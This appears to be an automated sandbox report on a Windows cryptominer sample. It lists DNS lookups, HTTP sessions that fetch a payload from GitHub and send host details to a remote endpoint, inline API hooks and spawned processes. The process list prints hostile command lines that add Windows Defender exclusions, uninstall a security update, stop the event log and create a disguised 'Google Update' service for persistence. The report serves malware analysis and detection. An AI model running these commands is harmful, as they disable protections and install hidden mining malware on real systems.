Jul 14, 2024 23:41:31.497489929 CEST | 192.168.2.5 | 1.1.1.1 | 0x31bc | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:34.028191090 CEST | 192.168.2.5 | 1.1.1.1 | 0x20b6 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:44.012006044 CEST | 192.168.2.5 | 1.1.1.1 | 0x575b | Standard query (0) | gulf.moneroocean.stream | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:45.501876116 CEST | 192.168.2.5 | 1.1.1.1 | 0x7dae | Standard query (0) | wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 14, 2024 23:41:31.505983114 CEST | 1.1.1.1 | 192.168.2.5 | 0x31bc | No error (0) | github.com | | 140.82.121.3 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:34.035373926 CEST | 1.1.1.1 | 192.168.2.5 | 0x20b6 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:34.035373926 CEST | 1.1.1.1 | 192.168.2.5 | 0x20b6 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:34.035373926 CEST | 1.1.1.1 | 192.168.2.5 | 0x20b6 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:34.035373926 CEST | 1.1.1.1 | 192.168.2.5 | 0x20b6 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:44.019701958 CEST | 1.1.1.1 | 192.168.2.5 | 0x575b | No error (0) | gulf.moneroocean.stream | monerooceans.stream | | CNAME (Canonical name) | IN (0x0001) | false
Jul 14, 2024 23:41:44.019701958 CEST | 1.1.1.1 | 192.168.2.5 | 0x575b | No error (0) | monerooceans.stream | | 149.102.143.109 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:45.612310886 CEST | 1.1.1.1 | 192.168.2.5 | 0x7dae | No error (0) | wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org | | 172.67.206.184 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 23:41:45.612310886 CEST | 1.1.1.1 | 192.168.2.5 | 0x7dae | No error (0) | wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org | | 104.21.61.58 | A (IP address) | IN (0x0001) | false
                                                                        • github.com
                                                                        • raw.githubusercontent.com
                                                                        • wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49727 | 140.82.121.3 | 443 | 612 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-14 21:41:32 UTC | 170 | OUT | GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true HTTP/1.1
Host: github.com
Connection: Keep-Alive
2024-07-14 21:41:32 UTC | 569 | IN | HTTP/1.1 302 Found
                                                                        Server: GitHub.com
                                                                        Date: Sun, 14 Jul 2024 21:41:32 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                        Location: https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe
                                                                        Cache-Control: no-cache
                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                        X-Frame-Options: deny
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 0
                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                        2024-07-14 21:41:32 UTC3474INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                        2024-07-14 21:41:32 UTC223INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 6f 67 67 65 64 5f 69 6e 3d 6e 6f 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 67 69 74 68 75 62 2e 63 6f 6d 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 31 34 20 4a 75 6c 20 32 30 32 35 20 32 31 3a 34 31 3a 33 32 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 58 2d 47 69 74 48 75 62 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 37 46 43 30 3a 31 41 42 42 43 35 3a 37 43 30 33 34 31 43 3a 37 46 32 33 32 31 37 3a 36 36 39 34 34 36 30 43 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                        Data Ascii: Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Mon, 14 Jul 2025 21:41:32 GMT; HttpOnly; Secure; SameSite=LaxContent-Length: 0X-GitHub-Request-Id: 7FC0:1ABBC5:7C0341C:7F23217:6694460Cconnection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49728 | 140.82.121.3 | 443 | 612 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-14 21:41:33 UTC | 136 | OUT | GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe HTTP/1.1
    Host: github.com
2024-07-14 21:41:34 UTC | 611 | IN | HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Sun, 14 Jul 2024 21:41:33 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin:
    Location: https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
2024-07-14 21:41:34 UTC | 3029 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49729 | 185.199.109.133 | 443 | 612 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-14 21:41:34 UTC | 171 | OUT | GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-07-14 21:41:34 UTC | 898 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 2870272
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "0c99422a1499a3143c0132d15a7a061490125f4c2e74ae0e6b32c144f29fa8c2"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 903D:169A42:129625F:1484276:6694460E
    Accept-Ranges: bytes
    Date: Sun, 14 Jul 2024 21:41:34 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr18129-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1720993295.571340,VS0,VE196
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 0ed784ab922fb9c965674147d0b2f4f3660fb547
    Expires: Sun, 14 Jul 2024 21:46:34 GMT
    Source-Age: 0
2024-07-14 21:41:34 UTC | 1378 | IN | Data Ascii: MZx@xhr!L!This program cannot be run in DOS mode.$PEdV3be"~J+@@0,`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49735 | 172.67.206.184 | 443 | 7780 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-14 21:41:46 UTC | 228 | OUT | POST /api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 487
    Content-Type: application/json
    Host: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
    User-Agent: cpp-httplib/0.12.6
2024-07-14 21:41:46 UTC | 487 | OUT | Data Ascii: {"id":"cwzyhcjpggltbmjx","computername":"648351","username":"SYSTEM","gpu":"P_HEPKE","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":1,
2024-07-14 21:41:46 UTC | 652 | IN | HTTP/1.1 200 OK
    Date: Sun, 14 Jul 2024 21:41:46 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSpR%2BBjBEWraTt91roIhSVrZkBfirBfkgiv%2Fn5032ekl5ezQmIoVBxoIJU5JQtOxUkgiro9x6yz3cumSWud%2FudCV2t%2B8k9xD286fCfy3ih1r1jnqTtisEWvJvNTypSID0RQ8ft45dPrtfxlZ6rZftflubSorbgSd15YXutUNzOridkxgP%2FEM1eh1QleKkU1hL9jSdmOhEg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8a34adc3b953183d-EWR
    alt-svc: h3=":443"; ma=86400
2024-07-14 21:41:46 UTC | 7 | IN | Data Raw: 32 0d 0a 7b 7d 0d 0a
    Data Ascii: 2{}
2024-07-14 21:41:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49744 | 172.67.206.184 | 443 | 7780 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-14 21:42:44 UTC | 228 | OUT | POST /api/endpoint.php HTTP/1.1
    Accept: */*
    Connection: close
    Content-Length: 503
    Content-Type: application/json
    Host: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
    User-Agent: cpp-httplib/0.12.6
2024-07-14 21:42:44 UTC | 503 | OUT | Data Ascii: {"id":"cwzyhcjpggltbmjx","computername":"648351","username":"SYSTEM","gpu":"P_HEPKE","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":60
2024-07-14 21:42:44 UTC | 646 | IN | HTTP/1.1 200 OK
    Date: Sun, 14 Jul 2024 21:42:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WT8UOs9PSjcybViy9XuMg%2BfgDmTorF3LLosmo4u4oQ1tmaWAY0Vaw3etT9KziJhUHIh2owRn9DlhRLEiSEryRKfvJOCl9WoLHnfNFb6XNNCUjLloaRc32b8QX6MH9upKK90SIgE5MVl9v7gVo%2BSNvOIZDfJuXvXMvX54C5twojvkuU29UB83HkunAONGnJDq9Sdn6sEXWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8a34af30bff61982-EWR
    alt-svc: h3=":443"; ma=86400
2024-07-14 21:42:44 UTC | 7 | IN | Data Raw: 32 0d 0a 7b 7d 0d 0a
    Data Ascii: 2{}
2024-07-14 21:42:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                        Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
ZwResumeThread | INLINE | winlogon.exe, explorer.exe
NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
NtEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
NtResumeThread | INLINE | winlogon.exe, explorer.exe
RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe
NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID: 1
Start time: 17:41:22
Start date: 14/07/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe"
Imagebase: 0x3e0000
File size: 38'400 bytes
MD5 hash: 1547E40089B1B06C2E27658C4F478466
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 17:41:36
Start date: 14/07/2024
Path: C:\Windows\SysWOW64\system64x.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\SysWOW64\system64x.exe"
Imagebase: 0x7ff762440000
File size: 2'870'272 bytes
MD5 hash: 4471F946569BFA17D68108068D7A17A1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 92%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 4
Start time: 17:41:36
Start date: 14/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 17:41:36
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff6f0230000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase: 0x7ff679bb0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase: 0x7ff679bb0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase: 0x7ff679bb0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 13
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase: 0x7ff679bb0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 16
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\dialer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\dialer.exe
Imagebase: 0x7ff765480000
File size: 39'936 bytes
MD5 hash: B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
Imagebase: 0x7ff7ec9c0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\wusa.exe
Wow64 process (32bit): false
Commandline: wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff724960000
File size: 345'088 bytes
MD5 hash: FBDA2B8987895780375FE0E6254F6198
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
Imagebase: 0x7ff7ec9c0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\winlogon.exe
Wow64 process (32bit): false
Commandline: winlogon.exe
Imagebase: 0x7ff6156c0000
File size: 906'240 bytes
MD5 hash: F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 23
Start time: 17:41:39
Start date: 14/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                        Target ID:24
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                        Imagebase:0x7ff7ec9c0000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:25
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                        Imagebase:0x7ff7ec9c0000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:26
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:27
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:28
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                                        Imagebase:0x7ff72af20000
